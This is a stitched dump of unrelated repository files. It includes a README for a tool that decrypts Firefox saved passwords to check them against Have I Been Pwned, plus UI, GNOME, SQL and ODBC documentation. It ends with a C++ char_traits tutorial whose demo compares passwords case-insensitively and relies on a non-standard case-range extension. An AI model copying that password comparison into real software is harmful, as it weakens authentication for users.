- To specify a path to a Firefox profile directory, use the `--profile` option (by default: the first file found matching `~/.mozilla/firefox/*.default` on Ubuntu or `~/Library/Application\ Support/Firefox/Profiles/*.default` on Mac OS)
- To adjust the number of threads used to make requests to the Have I Been Pwned API, use the `--threads` option (by default: 10)
## Docker image
[](https://microbadger.com/images/christophetd/firepwned)
You can also use the `christophetd/firepwned` image. It is based on Alpine and is very lightweight (~20 MB). However, keep in mind that using a Docker image you didn't build yourself is generally not a good practice: I *could* very well have built it myself with a different source code than the one in this repository in order to steal your passwords (spoiler: that's not the case). If you wish to build the image yourself, run `docker build . -t firepwned` and use `firepwned` instead of `christophetd/firepwned` in the instructions below.
When running the container, you need to mount the directory of your Firefox profile to `/profile` in the container.
```
$ docker run --rm -it \
--volume $(ls -d ~/.mozilla/firefox/*.default):/profile \
christophetd/firepwned
```
Any additional argument you add to the command will be passed to the script, e.g.
```
$ docker run --rm -it \
--volume $(ls -d ~/.mozilla/firefox/*.default):/profile \
christophetd/firepwned \
--threads 20
```
## How it works
The Have I Been Pwned API supports checking if a password has been leaked without providing the password itself, or even a hash. The way it works is you provide the API with the first 5 characters of the SHA1 hash of the password to check. The API then returns the list of all leaked hashes starting with this prefix, and the script can check locally if one of the hashes matches the password. More information: https://www.troyhunt.com/ive-just-launched-pwned-passwords-version-2/
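As a sketch of that flow (function names here are illustrative, not the project's actual code; the parsing assumes the documented `SUFFIX:COUNT` line format of the range response):

```python
import hashlib

def split_sha1(password):
    """Return the 5-char prefix sent to the API and the suffix kept locally."""
    digest = hashlib.sha1(password.encode("utf-8")).hexdigest().upper()
    return digest[:5], digest[5:]

def pwned_count(password, range_response):
    """Match the local suffix against the 'SUFFIX:COUNT' lines for its prefix."""
    _, suffix = split_sha1(password)
    for line in range_response.splitlines():
        candidate, _, count = line.partition(":")
        if candidate.strip() == suffix:
            return int(count)
    return 0  # password's hash suffix not in the leaked set
```

Only the 5-character prefix ever leaves the machine; the full hash and the password stay local.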
## Compatibility
Python 3 only. Should theoretically work on any OS supporting Python if provided with the directory of a valid Firefox profile, e.g. on Windows 7:
```
> python firepwned.py --profile "C:\Users\Christophe\AppData\Roaming\Mozilla\Firefox\Profiles\xxxxxx.default"
```
## Acknowledgments
The code to read the saved passwords from Firefox is taken from [firefox_decrypt](https://github.com/unode/firefox_decrypt), written by Renato Alves and under the GPL-3.0 license.
## Unit tests
```
$ python -m unittest discover test
```
| 43.768293 | 541 | 0.747283 | eng_Latn | 0.988949 |
edffac1b7aea3aadea7ac1e7352a1b8aec35800d | 11,768 | md | Markdown | website/docs/fr-FR/dropdown.md | pumelotea/element-plus | 1ab50ded03bbf46fb36a6495b207c6785019e753 | [
"MIT"
] | 1 | 2020-12-04T07:06:20.000Z | 2020-12-04T07:06:20.000Z | website/docs/fr-FR/dropdown.md | pumelotea/element-plus | 1ab50ded03bbf46fb36a6495b207c6785019e753 | [
"MIT"
] | 57 | 2020-09-02T01:24:02.000Z | 2021-04-30T03:34:46.000Z | website/docs/fr-FR/dropdown.md | pumelotea/element-plus | 1ab50ded03bbf46fb36a6495b207c6785019e753 | [
"MIT"
] | 1 | 2022-03-09T14:57:00.000Z | 2022-03-09T14:57:00.000Z | ## Dropdown
Toggleable menu for displaying lists of links and actions.
### Usage
Hover over the menu to unfold its contents.
:::demo The triggering element is rendered by the default `slot`, and the dropdown part is rendered by the `slot` named `dropdown`. By default, the dropdown simply shows when you hover over the triggering element, without having to click it.
```html
<el-dropdown>
<span class="el-dropdown-link">
    Dropdown List<i class="el-icon-arrow-down el-icon--right"></i>
</span>
<template #dropdown>
<el-dropdown-menu>
<el-dropdown-item>Action 1</el-dropdown-item>
<el-dropdown-item>Action 2</el-dropdown-item>
<el-dropdown-item>Action 3</el-dropdown-item>
<el-dropdown-item disabled>Action 4</el-dropdown-item>
<el-dropdown-item divided>Action 5</el-dropdown-item>
</el-dropdown-menu>
</template>
</el-dropdown>
<style>
.el-dropdown-link {
cursor: pointer;
color: #409EFF;
}
.el-icon-arrow-down {
font-size: 12px;
}
</style>
```
:::
### Triggering element
Use the button to open the dropdown menu.
:::demo Use `split-button` to separate the trigger from the rest of the button: the latter becomes the left part, and the trigger becomes the right part.
```html
<el-dropdown>
<el-button type="primary">
    Dropdown List<i class="el-icon-arrow-down el-icon--right"></i>
</el-button>
<template #dropdown>
<el-dropdown-menu>
<el-dropdown-item>Action 1</el-dropdown-item>
<el-dropdown-item>Action 2</el-dropdown-item>
<el-dropdown-item>Action 3</el-dropdown-item>
<el-dropdown-item>Action 4</el-dropdown-item>
<el-dropdown-item>Action 5</el-dropdown-item>
</el-dropdown-menu>
</template>
</el-dropdown>
<el-dropdown split-button type="primary" @click="handleClick">
  Dropdown List
<template #dropdown>
<el-dropdown-menu>
<el-dropdown-item>Action 1</el-dropdown-item>
<el-dropdown-item>Action 2</el-dropdown-item>
<el-dropdown-item>Action 3</el-dropdown-item>
<el-dropdown-item>Action 4</el-dropdown-item>
<el-dropdown-item>Action 5</el-dropdown-item>
</el-dropdown-menu>
</template>
</el-dropdown>
<style>
.el-dropdown {
vertical-align: top;
}
.el-dropdown + .el-dropdown {
margin-left: 15px;
}
.el-icon-arrow-down {
font-size: 12px;
}
</style>
<script>
export default {
methods: {
handleClick() {
alert('button click');
}
}
}
</script>
```
:::
### How to trigger
You can choose to trigger the menu on click, or by hovering over the element.
:::demo Use the `trigger` attribute. By default, it is `hover`.
```html
<el-row class="block-col-2">
<el-col :span="8">
    <span class="demonstration">hover to trigger</span>
<el-dropdown>
<span class="el-dropdown-link">
        Dropdown List<i class="el-icon-arrow-down el-icon--right"></i>
</span>
<template #dropdown>
<el-dropdown-menu>
<el-dropdown-item icon="el-icon-plus">Action 1</el-dropdown-item>
<el-dropdown-item icon="el-icon-circle-plus">Action 2</el-dropdown-item>
<el-dropdown-item icon="el-icon-circle-plus-outline">Action 3</el-dropdown-item>
<el-dropdown-item icon="el-icon-check">Action 4</el-dropdown-item>
<el-dropdown-item icon="el-icon-circle-check">Action 5</el-dropdown-item>
</el-dropdown-menu>
</template>
</el-dropdown>
</el-col>
<el-col :span="8">
    <span class="demonstration">click to trigger</span>
<el-dropdown trigger="click">
<span class="el-dropdown-link">
        Dropdown List<i class="el-icon-arrow-down el-icon--right"></i>
</span>
<template #dropdown>
<el-dropdown-menu>
<el-dropdown-item icon="el-icon-plus">Action 1</el-dropdown-item>
<el-dropdown-item icon="el-icon-circle-plus">Action 2</el-dropdown-item>
<el-dropdown-item icon="el-icon-circle-plus-outline">Action 3</el-dropdown-item>
<el-dropdown-item icon="el-icon-check">Action 4</el-dropdown-item>
<el-dropdown-item icon="el-icon-circle-check">Action 5</el-dropdown-item>
</el-dropdown-menu>
</template>
</el-dropdown>
</el-col>
<el-col :span="8">
    <span class="demonstration">right-click to trigger</span>
<el-dropdown trigger="contextmenu">
<span class="el-dropdown-link">
        Dropdown List<i class="el-icon-arrow-down el-icon--right"></i>
</span>
<template #dropdown>
<el-dropdown-menu>
<el-dropdown-item icon="el-icon-plus">Action 1</el-dropdown-item>
<el-dropdown-item icon="el-icon-circle-plus">Action 2</el-dropdown-item>
<el-dropdown-item icon="el-icon-circle-plus-outline">Action 3</el-dropdown-item>
<el-dropdown-item icon="el-icon-check">Action 4</el-dropdown-item>
<el-dropdown-item icon="el-icon-circle-check">Action 5</el-dropdown-item>
</el-dropdown-menu>
</template>
</el-dropdown>
</el-col>
</el-row>
<style>
.el-dropdown-link {
cursor: pointer;
color: #409EFF;
}
.el-icon-arrow-down {
font-size: 12px;
}
.demonstration {
display: block;
color: #8492a6;
font-size: 14px;
margin-bottom: 20px;
}
</style>
```
:::
### Menu hiding behavior
Use the `hide-on-click` attribute to define whether the menu closes after you click a menu item.
:::demo By default the menu closes after you click an item in it. You can change this by setting `hide-on-click` to `false`.
```html
<el-dropdown :hide-on-click="false">
<span class="el-dropdown-link">
    Dropdown List<i class="el-icon-arrow-down el-icon--right"></i>
</span>
<template #dropdown>
<el-dropdown-menu>
<el-dropdown-item>Action 1</el-dropdown-item>
<el-dropdown-item>Action 2</el-dropdown-item>
<el-dropdown-item>Action 3</el-dropdown-item>
<el-dropdown-item disabled>Action 4</el-dropdown-item>
<el-dropdown-item divided>Action 5</el-dropdown-item>
</el-dropdown-menu>
</template>
</el-dropdown>
<style>
.el-dropdown-link {
cursor: pointer;
color: #409EFF;
}
.el-icon-arrow-down {
font-size: 12px;
}
</style>
```
:::
### Command event
Clicking an item in the dropdown menu fires a "command" event.
Each item in the list can be assigned its own command parameter.
:::demo
```html
<el-dropdown @command="handleCommand">
<span class="el-dropdown-link">
    Dropdown List<i class="el-icon-arrow-down el-icon--right"></i>
</span>
<template #dropdown>
<el-dropdown-menu>
<el-dropdown-item command="a">Action 1</el-dropdown-item>
<el-dropdown-item command="b">Action 2</el-dropdown-item>
<el-dropdown-item command="c">Action 3</el-dropdown-item>
<el-dropdown-item command="d" disabled>Action 4</el-dropdown-item>
<el-dropdown-item command="e" divided>Action 5</el-dropdown-item>
</el-dropdown-menu>
</template>
</el-dropdown>
<style>
.el-dropdown-link {
cursor: pointer;
color: #409EFF;
}
.el-icon-arrow-down {
font-size: 12px;
}
</style>
<script>
export default {
methods: {
handleCommand(command) {
this.$message('click on item ' + command);
}
}
}
</script>
```
:::
### Sizes
Besides the default size, the Dropdown component provides three additional sizes.
:::demo Use the `size` attribute to set an additional size: `medium`, `small` or `mini`.
```html
<el-dropdown split-button type="primary">
  Default
<template #dropdown>
<el-dropdown-menu>
<el-dropdown-item>Action 1</el-dropdown-item>
<el-dropdown-item>Action 2</el-dropdown-item>
<el-dropdown-item>Action 3</el-dropdown-item>
<el-dropdown-item>Action 4</el-dropdown-item>
</el-dropdown-menu>
</template>
</el-dropdown>
<el-dropdown size="medium" split-button type="primary">
Medium
<template #dropdown>
<el-dropdown-menu>
<el-dropdown-item>Action 1</el-dropdown-item>
<el-dropdown-item>Action 2</el-dropdown-item>
<el-dropdown-item>Action 3</el-dropdown-item>
<el-dropdown-item>Action 4</el-dropdown-item>
</el-dropdown-menu>
</template>
</el-dropdown>
<el-dropdown size="small" split-button type="primary">
Small
<template #dropdown>
<el-dropdown-menu>
<el-dropdown-item>Action 1</el-dropdown-item>
<el-dropdown-item>Action 2</el-dropdown-item>
<el-dropdown-item>Action 3</el-dropdown-item>
<el-dropdown-item>Action 4</el-dropdown-item>
</el-dropdown-menu>
</template>
</el-dropdown>
<el-dropdown size="mini" split-button type="primary">
Mini
<template #dropdown>
<el-dropdown-menu>
<el-dropdown-item>Action 1</el-dropdown-item>
<el-dropdown-item>Action 2</el-dropdown-item>
<el-dropdown-item>Action 3</el-dropdown-item>
<el-dropdown-item>Action 4</el-dropdown-item>
</el-dropdown-menu>
</template>
</el-dropdown>
```
:::
### Dropdown Attributes
| Attribute | Description | Type | Accepted Values | Default |
|------------- |---------------- |---------------- |---------------------- |-------- |
| type | Type of the button, refer to the `Button` component. Only works when `split-button` is `true`. | string | — | — |
| size | Size of the menu, also works on `split button`. | string | medium / small / mini | — |
| max-height | Max height of the menu. | string / number | — | — |
| split-button | Whether to split the button into two. | boolean | — | false |
| placement | Placement of the dropdown menu. | string | top/top-start/top-end/bottom/bottom-start/bottom-end | bottom-end |
| trigger | How to trigger the menu. | string | hover/click/contextmenu | hover |
| hide-on-click | Whether the menu should hide after an item is clicked. | boolean | — | true |
| show-timeout | Delay before the menu shows (only works when `trigger` is `hover`). | number | — | 250 |
| hide-timeout | Delay before the menu hides (only works when `trigger` is `hover`). | number | — | 150 |
| tabindex | [tabindex](https://developer.mozilla.org/fr/docs/Web/HTML/Attributs_universels/tabindex) of the Dropdown. | number | — | 0 |
### Dropdown Slots
| Name | Description |
|------|--------|
| — | Content of the Dropdown. Note: it must be a valid DOM element (e.g. `<span>, <button> etc.`) or `el-component`, so the triggering event can be attached. |
| dropdown | Content of the Dropdown menu, usually an `<el-dropdown-menu>` element. |
### Dropdown Events
| Name | Description | Parameters |
|---------- |-------- |---------- |
| click | If `split-button` is `true`, fires when the left button is clicked. | — |
| command | Fires when an item of the list is clicked. | The command attribute of the clicked item. |
| visible-change | Fires when the dropdown menu shows or hides. | `true` when it shows, `false` otherwise. |
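The table above lists a `visible-change` event that none of the earlier demos use. As a minimal sketch (the handler names here are illustrative, not part of the API), it can be wired up the same way as `command`:

```html
<el-dropdown @command="handleCommand" @visible-change="handleVisibleChange">
  <span class="el-dropdown-link">
    Dropdown List<i class="el-icon-arrow-down el-icon--right"></i>
  </span>
  <template #dropdown>
    <el-dropdown-menu>
      <el-dropdown-item command="a">Action 1</el-dropdown-item>
    </el-dropdown-menu>
  </template>
</el-dropdown>
<script>
export default {
  methods: {
    handleCommand(command) {
      // `command` is the command attribute of the clicked item
    },
    handleVisibleChange(visible) {
      // `visible` is true when the menu appears, false when it hides
    }
  }
}
</script>
```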
### Dropdown Menu Item Attributes
| Attribute | Description | Type | Accepted Values | Default |
|------------- |---------------- |---------------- |---------------------- |-------- |
| command | The value to send to the callback of the Dropdown's `command` event. | string/number/object | — | — |
| disabled | Whether the item is disabled. | boolean | — | false |
| divided | Whether a divider is displayed. | boolean | — | false |
| icon | Class name of the icon. | string | — | — |
Easy Steps to Make GNOME 3 More Efficient
================================================================================
Few Linux desktops are as controversial as GNOME 3. Since its release it has been ridiculed, mocked, and hated. The thing is, it's actually a very good desktop. It's solid, reliable, stable, elegant, and simple... and with a few small tweaks and add-ons, it can be made into one of the most efficient and user-friendly desktops available.
Of course, what makes a desktop efficient and/or user friendly? That comes down to opinion — and everyone has one. At the end of the day, my goal is to help you get quick access to the applications and files you use. Simple. Believe it or not, turning GNOME 3 into a more efficient and user-friendly environment, one step at a time, is an easy task — you just need to know where to look and what to do. Here, I'll steer you in the right direction.
I decided to start from a clean install of the [Ubuntu GNOME][1] distribution, which includes a GNOME 3.12 desktop. With the GNOME-centric desktop in place, it was time to start fine-tuning it.
### Add window buttons ###
For reasons unknown, the GNOME developers decided to toss aside the standard window buttons (close, minimize, maximize) in favor of windows with a single close button. Missing the maximize button is one thing (you can simply drag a window to the top of the screen to maximize it), and you can also minimize or maximize by right-clicking the title bar and choosing the action there. That change just adds extra steps, so the missing minimize button is genuinely puzzling. Fortunately, there's a simple fix for this problem. Here's how:
By default, you should already have the GNOME Tweak Tool installed. With this tool, you can switch the maximize and minimize buttons back on (Figure 1).
<center>
*Figure 1: Adding the minimize button back to GNOME 3 windows*</center>
Once added, you'll see the minimize button to the left of the close button, ready to serve. Your windows are now easier to manage.
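If you'd rather skip the GUI, the same window-button change can usually be made from a terminal with `gsettings`. This is an alternative to the Tweak Tool route the article takes, and the exact button layout string is your choice:

```shell
# Show minimize, maximize, and close buttons on the right side of the title bar
gsettings set org.gnome.desktop.wm.preferences button-layout ':minimize,maximize,close'
```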
In the same Tweak Tool, you can also apply plenty of other helpful GNOME configurations:
- Set the window focus mode
- Set the system fonts
- Set the GNOME theme
- Add startup applications
- Add extensions
### Add extensions ###
One of the best features of GNOME 3 is shell extensions, which bring all sorts of useful capabilities to GNOME. There's no need to install shell extensions from a package manager. You can visit the [GNOME Shell Extensions][2] site, search for the extension you want, click its entry in the list, click the ON toggle, and the extension is installed; alternatively, you can add extensions from the GNOME Tweak Tool (you'll find more of them available on the website).
Note: You may need to allow extension installation in your browser. If so, you'll see a warning the first time you visit the GNOME Shell Extensions site. When prompted, just click Allow.
One of the more impressive (and handy) extensions is [Dash to Dock][3].
This extension moves the Dash out of the Applications overview and turns it into a fairly standard dock (Figure 2).
<center>
*Figure 2: Dash to Dock adds a dock to GNOME 3*</center>
When you add applications to the Dash, they are added to Dash to Dock as well. You can still reach the Applications overview by clicking the six-dot icon at the bottom of the dock.
There are plenty of other extensions dedicated to making GNOME 3 a more efficient desktop, including these fine options:
- [Recent Items][4]: Adds a drop-down menu of recently used items to the panel.
- [Search Firefox Bookmarks][5]: Search (and launch) bookmarks from the overview.
- [Quicklists][6]: Adds a jump-list pop-up menu to Dash icons (this extension lets you quickly open new documents associated with an application, and more).
- [Todo List][7]: Adds a drop-down list to the panel that lets you add items to a to-do list.
- [Web Search Dialog][8]: Lets you quickly search the web by pressing Ctrl+Space and entering a text string (results appear in a new browser tab).
### Add a full-featured dock ###
If Dash to Dock is still too limited for you (say, you want a notification area and more), allow me to recommend one of my favorite docks, [Cairo Dock][9] (Figure 3).
<center>
*Figure 3: Cairo Dock standing by*</center>
After you add Cairo Dock to GNOME 3, your experience grows by leaps and bounds. Install this excellent dock from your distribution's package manager.
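Package names vary by distribution; on the Ubuntu GNOME setup used above, the install would typically look like the following (the package name is an assumption — check your distribution's repositories):

```shell
# Install Cairo Dock and its plug-ins from the Ubuntu repositories
sudo apt-get install cairo-dock cairo-dock-plug-ins
```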
Don't write GNOME 3 off as an inefficient, user-unfriendly desktop. With a few small tweaks, GNOME 3 can be every bit as powerful and user friendly as any other desktop out there.
--------------------------------------------------------------------------------
via: http://www.linux.com/learn/tutorials/781916-easy-steps-to-make-gnome-3-more-efficient
Author: [Jack Wallen][a]
Translator: [GOLinux](https://github.com/GOLinux)
Proofreader: [wxy](https://github.com/wxy)
This article was translated by [LCTT](https://github.com/LCTT/TranslateProject) and proudly presented by [Linux中国](http://linux.cn/)
[a]:http://www.linux.com/community/forums/person/93
[1]:http://ubuntugnome.org/
[2]:https://extensions.gnome.org/
[3]:https://extensions.gnome.org/extension/307/dash-to-dock/
[4]:https://extensions.gnome.org/extension/72/recent-items/
[5]:https://extensions.gnome.org/extension/149/search-firefox-bookmarks-provider/
[6]:https://extensions.gnome.org/extension/322/quicklists/
[7]:https://extensions.gnome.org/extension/162/todo-list/
[8]:https://extensions.gnome.org/extension/549/web-search-dialog/
[9]:http://glx-dock.org/index.php
---
name: Discount Mart Sales Analytics
tools: [Tableau, Data Analytics, Sales, Product Monitoring, Dashboard]
image:
description: A dashboard that helps track a supermarket's sales, profits, and inventory.
external_url: https://public.tableau.com/views/DiscountMartSalesAnalytics_16251963203240/Dashboard?:language=en-US&:display_count=n&:origin=viz_share_link
---
---
title: Getting started with system-versioned temporal tables | Microsoft Docs
ms.custom: ''
ms.date: 03/28/2016
ms.prod: sql
ms.prod_service: database-engine, sql-database
ms.reviewer: ''
ms.technology: table-view-index
ms.topic: conceptual
ms.assetid: d431f216-82cf-4d97-825e-bb35d3d53a45
author: CarlRabeler
ms.author: carlrab
monikerRange: =azuresqldb-current||>=sql-server-2016||=sqlallproducts-allversions||>=sql-server-linux-2017||=azuresqldb-mi-current
ms.openlocfilehash: a87f79468344173034655a06ae87d33aa2931b9d
ms.sourcegitcommit: b57d98e9b2444348f95c83a24b8eea0e6c9da58d
ms.translationtype: HT
ms.contentlocale: zh-CN
ms.lasthandoff: 07/21/2020
ms.locfileid: "86552705"
---
# <a name="getting-started-with-system-versioned-temporal-tables"></a>Getting started with system-versioned temporal tables
[!INCLUDE [sqlserver2016-asdb-asdbmi](../../includes/applies-to-version/sqlserver2016-asdb-asdbmi.md)]
Depending on your scenario, you can either create new system-versioned temporal tables or modify existing tables by adding temporal attributes to the existing table schema. When data in a temporal table is modified, the system generates a version history that is completely transparent to applications and end users. As a result, using system-versioned temporal tables requires no changes to how you modify data or query the latest (actual) state of the data.
Beyond regular DML and queries, temporal tables also give you a simple, convenient way to gain insight from your data history through extended Transact-SQL syntax. Every system-versioned table has a history table assigned to it, but that table is fully transparent to users — unless they want to optimize workload performance or storage footprint by creating additional indexes or choosing different storage options.
The following figure illustrates a typical workflow for working with system-versioned temporal tables:
This topic is divided into the following five subtopics:
- [Creating a system-versioned temporal table](../../relational-databases/tables/creating-a-system-versioned-temporal-table.md)
- [Modifying data in a system-versioned temporal table](../../relational-databases/tables/modifying-data-in-a-system-versioned-temporal-table.md)
- [Querying data in a system-versioned temporal table](../../relational-databases/tables/querying-data-in-a-system-versioned-temporal-table.md)
- [Changing the schema of a system-versioned temporal table](../../relational-databases/tables/changing-the-schema-of-a-system-versioned-temporal-table.md)
- [Stopping system-versioning on a system-versioned temporal table](../../relational-databases/tables/stopping-system-versioning-on-a-system-versioned-temporal-table.md)
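As a minimal sketch of what the creation step looks like, the following T-SQL declares a period, the two system-time columns, and turns system-versioning on (the table and column names here are made up for illustration; see the linked subtopics for the full treatment):

```sql
-- Hypothetical table: the PERIOD and WITH clauses are what make it temporal.
CREATE TABLE dbo.Department
(
    DeptID       int         NOT NULL PRIMARY KEY CLUSTERED,
    DeptName     varchar(50) NOT NULL,
    SysStartTime datetime2 GENERATED ALWAYS AS ROW START NOT NULL,
    SysEndTime   datetime2 GENERATED ALWAYS AS ROW END   NOT NULL,
    PERIOD FOR SYSTEM_TIME (SysStartTime, SysEndTime)
)
WITH (SYSTEM_VERSIONING = ON (HISTORY_TABLE = dbo.DepartmentHistory));
```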
## <a name="next-steps"></a>Next steps
- [Temporal tables](../../relational-databases/tables/temporal-tables.md)
- [Temporal table system consistency checks](../../relational-databases/tables/temporal-table-system-consistency-checks.md)
- [Partitioning with temporal tables](../../relational-databases/tables/partitioning-with-temporal-tables.md)
- [Temporal table considerations and limitations](../../relational-databases/tables/temporal-table-considerations-and-limitations.md)
- [Temporal table security](../../relational-databases/tables/temporal-table-security.md)
- [Manage retention of historical data in system-versioned temporal tables](../../relational-databases/tables/manage-retention-of-historical-data-in-system-versioned-temporal-tables.md)
- [System-versioned temporal tables with memory-optimized tables](../../relational-databases/tables/system-versioned-temporal-tables-with-memory-optimized-tables.md)
- [Temporal table metadata views and functions](../../relational-databases/tables/temporal-table-metadata-views-and-functions.md)
---
title: "Installing the Software (ODBC) | Microsoft Docs"
ms.custom: ""
ms.date: "01/19/2017"
ms.prod: "sql-non-specified"
ms.prod_service: "drivers"
ms.service: ""
ms.component: "odbc"
ms.reviewer: ""
ms.suite: "sql"
ms.technology:
- "drivers"
ms.tgt_pltfrm: ""
ms.topic: "article"
helpviewer_keywords:
- "ODBC driver for Oracle [ODBC], installing"
- "installing ODBC driver for Oracle [ODBC]"
ms.assetid: dfac8ade-eebe-4ebe-a199-feb740ed5bae
caps.latest.revision: 12
author: "MightyPen"
ms.author: "genemi"
manager: "jhubbard"
ms.workload: "Inactive"
---
# Installing the Software (ODBC)
> [!IMPORTANT]
> This feature will be removed in a future version of Windows. Avoid using this feature in new development work, and plan to modify applications that currently use this feature. Instead, use the ODBC driver provided by Oracle.
The ODBC Driver for Oracle is one of the data access components. It accompanies other ODBC components, such as the ODBC Data Source Administrator, and should already be installed. The driver also can be found under "Drivers and Other Downloads" on the Microsoft Product Support Services Online Web site at www.microsoft.com.
Network software must be installed according to its own documentation. The ODBC Driver for Oracle requires no special installation considerations as long as the network software is supported.
Oracle software must be installed according to its own documentation. The ODBC Driver for Oracle generally requires no special installation considerations as long as the installed Oracle version is supported by the driver. However, to keep products compatible, install the ODBC Driver for Oracle last to ensure you have the latest version of the driver. Oracle maintains a public FTP site where it posts, among other things, patches to the Oracle server products and the client component that ships with the server products. These patches are required for the proper functioning of several Microsoft products and technologies. For more information about this site, see [Oracle Software Patches](../../odbc/microsoft/oracle-software-patches.md).
> [!CAUTION]
> Installing Oracle software over MDAC/Windows DAC may overwrite current versions of MDAC. If problems arise using ODBC components, reinstall MDAC.
# Creating a custom string class by specializing std::char_traits
We know that `std::string` is extremely useful. Some people, however, need string types with their own custom handling.
Rolling your own string type from scratch is rarely a good idea, because safe string handling is hard. Fortunately, `std::string` is just one specialization of the `std::basic_string` class template. That class contains all the complicated memory handling, but it imposes no policy on how strings are copied or compared. So we can build on `basic_string` and pass in a custom class as a template parameter carrying exactly what we need.
In this section, we will see how to pass in such custom types and then create custom string classes without implementing much of anything ourselves.
## How to do it...
We will implement two custom string classes: `lc_string` and `ci_string`. The first builds an all-lowercase string from its input. The second does not transform its input at all, but it compares strings case-insensitively:
1. Include the necessary headers and declare the namespace in use:
```c++
#include <iostream>
#include <algorithm>
#include <string>
using namespace std;
```
2. Next we reimplement the `std::tolower` function, which is already defined in the header `<cctype>`. The existing one is ready to use, but it is not `constexpr`. Some `string` functions became `constexpr` in C++17, and we want to use them with our custom type. So, for an input character, we convert uppercase letters to lowercase and leave every other character untouched:
```c++
static constexpr char tolow(char c) {
switch (c) {
        case 'A'...'Z': return c - 'A' + 'a'; // exercise for the reader: expand the case range
default: return c;
}
}
```
3. The `std::basic_string` class accepts three template parameters: the character type, a character traits class, and an allocator type. In this section we only change the traits class, because it defines the string's behavior. To reimplement only the parts that differ from ordinary strings, we publicly inherit from the standard traits class:
```c++
class lc_traits : public char_traits<char> {
public:
```
4. Our class accepts input strings and converts them to lowercase. Here is a function that works at the level of individual characters, so we can apply our `tolow` function to it. It is `constexpr`:
```c++
static constexpr
void assign(char_type& r, const char_type& a ) {
r = tolow(a);
}
```
5. The other function copies a whole string into our buffer. We use `std::transform` to copy all the characters from the source string into the internal destination string, mapping each character to its lowercase version on the way:
```c++
static char_type* copy(char_type* dest,
const char_type* src,
size_t count) {
transform(src, src + count, dest, tolow);
return dest;
}
};
```
6. The traits class above lets us create a string class that effectively lowercases strings. Next we implement another class that leaves the original string unmodified but compares strings case-insensitively. It also inherits from the standard character traits class, but this time reimplements a different set of functions:
```c++
class ci_traits : public char_traits<char> {
public:
```
7. The `eq` function tells us whether two characters are equal. We implement one too, but we compare only the lowercase versions of the characters. That way 'A' and 'a' are equal:
```c++
static constexpr bool eq(char_type a, char_type b) {
return tolow(a) == tolow(b);
}
```
8. The `lt` function tells us which of two characters ranks lower in the alphabet. We apply the logical operator after, again, converting both characters to lowercase first:
```c++
static constexpr bool lt(char_type a, char_type b) {
return tolow(a) < tolow(b);
}
```
9. The last two functions worked at the character level; the next two work at the string level. The `compare` function works much like `strncmp`. If the two strings are equal over the length `count`, it returns 0. Otherwise it returns a negative or a positive number, the sign telling which of them ranks lower alphabetically. We compute the distance between the characters of the two strings — in lowercase, of course. Since C++14, this function can be declared `constexpr`:
```c++
static constexpr int compare(const char_type* s1,
const char_type* s2,
size_t count) {
for (; count; ++s1, ++s2, --count) {
const char_type diff (tolow(*s1) - tolow(*s2));
if (diff < 0) { return -1; }
else if (diff > 0) { return +1; }
}
return 0;
}
```
10. The last function we need is a case-insensitive `find`. For a given input string `p` of length `count`, it looks for the position of the character `ch`. It returns a pointer to the first matching character, or `nullptr` if there is none. Every comparison in this function goes through `tolow`, which makes the search case-insensitive. Unfortunately we cannot use `std::find_if` for this, because it is not `constexpr`, so we write the loop ourselves:
```c++
static constexpr
const char_type* find(const char_type* p,
size_t count,
const char_type& ch) {
const char_type find_c {tolow(ch)};
for (; count != 0; --count, ++p) {
if (find_c == tolow(*p)) { return p; }
}
return nullptr;
}
};
```
11. OK, all the custom classes are done. Now we can define two new string types. `lc_string` stands for lowercase string; `ci_string` stands for case-insensitive string. Both differ from `std::string` only in their traits:
```c++
using lc_string = basic_string<char, lc_traits>;
using ci_string = basic_string<char, ci_traits>;
```
12. To let output streams accept the new classes, we overload the stream output operator for each of them:
```c++
ostream& operator<<(ostream& os, const lc_string& str) {
return os.write(str.data(), str.size());
}
ostream& operator<<(ostream& os, const ci_string& str) {
return os.write(str.data(), str.size());
}
```
13. Now let's write the main function. First we create instances of an ordinary string, a lowercase string, and a case-insensitive string, and print them directly. They all look normal on the terminal, except that the lowercase string has converted all of its characters to lowercase:
```c++
int main()
{
cout << " string: "
<< string{"Foo Bar Baz"} << '\n'
<< "lc_string: "
<< lc_string{"Foo Bar Baz"} << '\n'
<< "ci_string: "
<< ci_string{"Foo Bar Baz"} << '\n';
```
14. To test the case-insensitive string, we instantiate two strings that differ only in case. When we compare them, they should turn out to be equal:
```c++
ci_string user_input {"MaGiC PaSsWoRd!"};
ci_string password {"magic password!"};
```
15. Then we compare them and print whether they match:
```c++
if (user_input == password) {
cout << "Passwords match: \"" << user_input
<< "\" == \"" << password << "\"\n";
}
}
```
16. Compiling and running the program gives the output we expect. The first three lines show the input unmodified, except that `lc_string` lowercases everything. The final comparison, being case-insensitive, reports a match:
```c++
$ ./custom_string
string: Foo Bar Baz
lc_string: foo bar baz
ci_string: Foo Bar Baz
Passwords match: "MaGiC PaSsWoRd!" == "magic password!"
```
## How it works...
All the subclassing and function implementations we just did can look baffling to a newcomer. Where do those function signatures come from? Why did we have to reimplement exactly those functions to get the behavior we wanted?
First, let's look at the class declaration of `std::string`:
```c++
template <
class CharT,
class Traits = std::char_traits<CharT>,
class Allocator = std::allocator<CharT>
>
class basic_string;
```
As you can see, `std::string` is really just a `std::basic_string<char>`, which expands to `std::basic_string<char, std::char_traits<char>, std::allocator<char>>`. That is a long type description, but what does it mean? It means strings are not limited to the signed `char` type; other character types work too, which frees strings from being tied to the ASCII character set. That is not our focus here, though.
The `char_traits<char>` class contains the algorithms that `basic_string` needs: `char_traits<char>` knows how to compare, find, and copy characters between strings.
The `allocator<char>` class is also a specialization; it allocates and frees storage for the string at runtime. That does not matter for us right now — we simply use its default behavior.
When we want a different string type, we can try to reuse what `basic_string` and `char_traits` already provide. We implemented two `char_traits` subclasses — a case-insensitive one and a lowercasing one — and either of them can stand in for the standard `char_traits` type.
> Note:
>
> To explore how far `basic_string` can be adapted, consult the C++ STL documentation's section on `std::char_traits` and see which other functions can be reimplemented.
61025805088ad6b8dece89016215317a041ca3a6 | 9,565 | md | Markdown | articles/azure-sql/managed-instance/tde-certificate-migrate.md | andreasahlund/azure-docs.sv-se | 00cec92906c1c97e2a9aca9c48c51082b3cbb69d | [
"CC-BY-4.0",
"MIT"
] | null | null | null | articles/azure-sql/managed-instance/tde-certificate-migrate.md | andreasahlund/azure-docs.sv-se | 00cec92906c1c97e2a9aca9c48c51082b3cbb69d | [
"CC-BY-4.0",
"MIT"
